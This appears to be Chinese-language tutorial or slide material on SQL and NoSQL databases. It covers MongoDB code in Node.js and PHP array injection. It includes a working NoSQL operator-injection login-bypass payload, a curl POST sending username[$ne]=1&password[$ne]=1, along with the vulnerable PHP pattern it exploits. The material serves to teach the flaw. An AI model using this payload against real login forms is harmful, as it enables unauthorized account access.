背景知識

SQL Based Database

• MySQL/MariaDB
• Microsoft SQL Server
• OracleSQL

NoSQL(Not Only SQL)

• 文件儲存型
  • MongoDB
  • RethinkDB
• 圖形關係型
  • Neo4j
• 鍵-值型
  • Redis
  • etcd
• 時序型
  • InfluxDB
• 列儲存
  • HBase

Simple SQL Statement

-- T-SQL

SELECT * FROM users WHERE `name` <> 1;

-- MySQL

SELECT * FROM users WHERE `name` != 1;

PHP Array & json

<?php

// Normal Array
$a = [
    'username' => 'Vincent Chi',
    'password' => 'password',
];
json_encode($a); // {"username":"Vincent Chi","password":"password"}

// Nested Array
$b = [
    'username' => ['a' => 1],
    'password' => ['a' => 1],
];
json_encode($b); // {"username":{"a":1},"password":{"a":1}}

MongoDB

let MongoClient = require('mongodb'),
    assert = require('assert')

let url = 'mongodb://localhost:27017/member'

MongoClient.connect(url, (err, db) => {
    assert(null, err)
    console.log("MongoDB Connection Created.")
    db.close()

})

Connection

let MongoClient = require('mongodb'),
    assert = require('assert')

let url = 'mongodb://localhost:27017/member'

let insertMembers = (db, callback) => {
    let collection = db.collection('documents')

    collection.insertMany([
        {username: 'Vincent Chi', password: 'password'},
        {username: 'Karuru Dissidia', password: 'HuskyCute'}
    ], (err, result) => {
        assert(null, err)
        assert(2, result.result.n)
        assert(2, result.ops.length)
        console.log('Insert 2 members into MongoDB')
        callback(result)
    })
}

MongoClient.connect(url, (err, db) => {
    assert(null, err)
    console.log("Connected successfully to server");

    insertMembers(db, () => db.close())
})

Insert

let MongoClient = require('mongodb'),
    assert = require('assert')

let url = 'mongodb://localhost:27017/member'

let insertMembers = (db, callback) => {
    // Insert {name: 'Vincent Chi', password: 'password'}
    // Insert {name: 'Karuru Dissidia', password: 'HuskyCute'}
}

let findMember = (db, callback, data) => {
    let collection = db.collection('documents')

    collection.find(data).toArray((err, members) => {
        assert(null, err)
        console.log(members)
        callback(members)
    })
}

MongoClient.connect(url, (err, db) => {
    assert(null, err)
    console.log("Connected successfully to server");

    insertMembers(db, () => {
        findMember(db, () => db.close(), {name: 'Vincent Chi'})
    })
})

Find

PHP Array Injection

<?php

$request['username'] = $_POST['username']; // Vincent Chi

$request['password'] = $_POST['password']; // password

curl -X POST "https://example.app/login" -d "username=Vincent%20Chi&password=password"

<?php

$request['username'] = $_POST['username']; // Vincent Chi

$request['password'] = $_POST['password']; // password


$mongodb = new MongoDB('mongodb://localhost:27017/members');

$mongodb->find($request);

db.find({
    username: 'Vincent Chi',
    password: 'password'
})

curl -X POST "https://example.app/login" -d "username[$ne]=1&password[$ne]=1"

<?php

$request['username'] = $_POST['username']; // ['$ne' => 1]

$request['password'] = $_POST['password']; // ['$ne' => 1]

<?php

$request['username'] = $_POST['username']; // ['$ne' => 1]

$request['password'] = $_POST['password']; // ['$ne' => 1]


$mongodb = new MongoDB('mongodb://localhost:27017/members');

$mongodb->find($request);

db.find({
    username: {$ne: 1},
    password: {$ne: 1}
})

# "$ne" is the not equals condition in MongoDB. 

SELECT * FROM members WHERE `username` != 1 OR `password` != 1;

NoSQL OR Injection

其它安全議題

具有相同潛在安全風險

• Redis